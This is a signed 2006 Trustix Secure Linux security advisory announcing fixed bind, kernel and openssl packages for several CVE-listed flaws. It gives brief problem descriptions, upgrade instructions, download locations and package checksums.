-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Trustix Secure Linux Security Advisory #2006-0051

Package names:	   bind, kernel, openssl
Summary:           Multiple vulnerabilities
Date:              2006-09-15
Affected versions: Trustix Secure Linux 2.2
                   Trustix Secure Linux 3.0
                   Trustix Operating System - Enterprise Server 2

- --------------------------------------------------------------------------
Package description:
  bind
  BIND (Berkeley Internet Name Domain) is an implementation of the DNS
  (Domain Name System) protocols. BIND includes a DNS server (named),
  which resolves host names to IP addresses, and a resolver library
  (routines for applications to use when interfacing with DNS). A DNS
  server allows clients to name resources or objects and share the
  information with other network machines. The named DNS server can be
  used on workstations as a caching name server, but is generally only
  needed on one machine for an entire network.

  kernel
  The kernel package contains the Linux kernel (vmlinuz), the core of 
  your Trustix Secure Linux operating system. The kernel handles the
  basic functions of the operating system: memory allocation, process
  allocation, device input and output, etc.

  openssl
  A C library that provides various crytographic algorithms and 
  protocols including DES, RC4, RSA, and SSL. Includes shared libraries.

Problem description:
  bind < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
  - New Upstream.
  - SECURITY Fix: Some vulnerabilities have been reported in BIND,
    which can be exploited by malicious people to cause a DoS.
  - Fix an assertion error within the processing of SIG queries that
    can be exploited to crash either a recursive server when more than
    one SIG(covered) Resource Record set (RRset) is returned or an
    authoritative server serving a RFC 2535 DNSSEC zone where there
    are multiple SIG(covered) RRsets.
  - Fix an error within the handling of multiple recursive queries that
    can be exploited to trigger an INSIST failure by causing the response
    to the query to arrive after all clients looking for the response 
    have left the recursion queue.

    The Common Vulnerabilities and Exposures project (cve.mitre.org) has
    assigned the names CVE-2006-4095 and CVE-2006-4096 to these issues.

  kernel < TSL 2.2 >
  - New Upstream.
  - SECURITY Fix: Fix possible UDF deadlock and memory corruption.
  - McAfee Avert Labs has reported a vulnerability in the Linux Kernel,
    which can be exploited by malicious, local users to gain escalated
    privileges. The vulnerability is caused due to an error in the SCTP
    module within the "sctp_make_abort_user()" function and can be 
    exploited to execute arbitrary code with escalated privileges.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the names CVE-2006-4145 and CVE-2006-3745 to these
    issues.
  - Also includes fixes for CVE-2006-0039, CVE-2006-1857, CVE-2006-1858,
    CVE-2006-1864, CVE-2006-2271, CVE-2006-2272, CVE-2006-1525,
    CVE-2006-2274, CVE-2006-1524, CVE-2005-3180, CVE-2005-2709,
    CVE-2005-2708, CVE-2005-2490, CVE-2006-1528 and CVE-2006-4093.

  openssl < TSL 3.0 > < TSL 2.2 > < TSEL 2 > 
  - New Upstream.
  - SECURITY FIX: A vulnerability has been identified which could be
    exploited by attackers to bypass security restrictions. This flaw is
    due to an error when handling and verifying RSA keys with exponent 3,
    which could be exploited by attackers to forge PKCS #1 v1.5 
    signatures and bypass security verifications.
                                                                                                                           
    The Common Vulnerabilities and Exposures project (cve.mitre.org) has
    assigned the name CVE-2006-4339.

Action:
  We recommend that all systems with this package installed be upgraded.
  Please note that if you do not need the functionality provided by this
  package, you may want to remove it from your system.


Location:
  All Trustix Secure Linux updates are available from
  <URI:http://http.trustix.org/pub/trustix/updates/>
  <URI:ftp://ftp.trustix.org/pub/trustix/updates/>


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.


Questions?
  Check out our mailing lists:
  <URI:http://www.trustix.org/support/>


Verification:
  This advisory along with all Trustix packages are signed with the
  TSL sign key.
  This key is available from:
  <URI:http://www.trustix.org/TSL-SIGN-KEY>

  The advisory itself is available from the errata pages at
  <URI:http://www.trustix.org/errata/trustix-2.2/> and
  <URI:http://www.trustix.org/errata/trustix-3.0/>
  or directly at
  <URI:http://www.trustix.org/errata/2006/0051/>


MD5sums of the packages:
- --------------------------------------------------------------------------
8a2c2f1f1da74781b4ecc088ccc76c62  3.0/rpms/bind-9.3.2-4tr.i586.rpm
ac17273772c921b947efaa4bbf045828  3.0/rpms/bind-devel-9.3.2-4tr.i586.rpm
5d0f66272575fcd9d4b4ac8696edfd2e  3.0/rpms/bind-libs-9.3.2-4tr.i586.rpm
4dc5e7726e88ee9071861eb35a14e44c  3.0/rpms/bind-light-9.3.2-4tr.i586.rpm
8a014940633e0a29375c62c3708a4e63  3.0/rpms/bind-light-devel-9.3.2-4tr.i586.rpm
d4da9d9e490b24e847434b47238107dd  3.0/rpms/bind-utils-9.3.2-4tr.i586.rpm
9c69891182a0c1c60870e89b41642f62  3.0/rpms/openssl-0.9.7k-1tr.i586.rpm
f5b5390d931bc5ebd9c4e0d8aadd9286  3.0/rpms/openssl-devel-0.9.7k-1tr.i586.rpm
deb2d3a044994706727989f07f84e70a  3.0/rpms/openssl-support-0.9.7k-1tr.i586.rpm

edcfc0e0b33e584772b3ab38c2ecc120  2.2/rpms/bind-9.3.2-4tr.i586.rpm
7c10280e5e0e85decd471c740651fcf7  2.2/rpms/bind-devel-9.3.2-4tr.i586.rpm
0b31ab1242338a21373a5b5677b38d15  2.2/rpms/bind-libs-9.3.2-4tr.i586.rpm
8715527a40ead4ce8e279ea85e96945b  2.2/rpms/bind-light-9.3.2-4tr.i586.rpm
a6e53d9494c395aa0b9964e91504063f  2.2/rpms/bind-light-devel-9.3.2-4tr.i586.rpm
fc9730b297ec56db37babc9d69f0777f  2.2/rpms/bind-utils-9.3.2-4tr.i586.rpm
2cb53a6092ab2de443576fc493c7c61f  2.2/rpms/kernel-2.4.33.3-1tr.i586.rpm
99ebf5b654d17918297f3ade9a188797  2.2/rpms/kernel-BOOT-2.4.33.3-1tr.i586.rpm
9d2325bf115bc51b97f3a1b7858950cd  2.2/rpms/kernel-doc-2.4.33.3-1tr.i586.rpm
22425048536337cfa6a78b50bc50b227  2.2/rpms/kernel-smp-2.4.33.3-1tr.i586.rpm
13aa3038815b939c4385c48738027097  2.2/rpms/kernel-source-2.4.33.3-1tr.i586.rpm
969b1acbb169f601348b429a1cd65d4b  2.2/rpms/kernel-utils-2.4.33.3-1tr.i586.rpm
d45c46c044c54a836b0a3e8b0ea61bd8  2.2/rpms/openssl-0.9.7e-7tr.i586.rpm
3d60834f48d77853e81606d2bcfbda81  2.2/rpms/openssl-devel-0.9.7e-7tr.i586.rpm
2bc39b5e84a862657dd28999fdddf43c  2.2/rpms/openssl-python-0.9.7e-7tr.i586.rpm
be83cfcd1ceae92288cbaf3d510a0482  2.2/rpms/openssl-support-0.9.7e-7tr.i586.rpm
- --------------------------------------------------------------------------


Trustix Security Team


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFFCrAZi8CEzsK9IksRAvIoAKCjFeJ+3aT++bYdEiclBP9//+xnrwCgm4XM
awIqUWa4H4yxfCDNoVpW2ms=
=Fq5S
-----END PGP SIGNATURE-----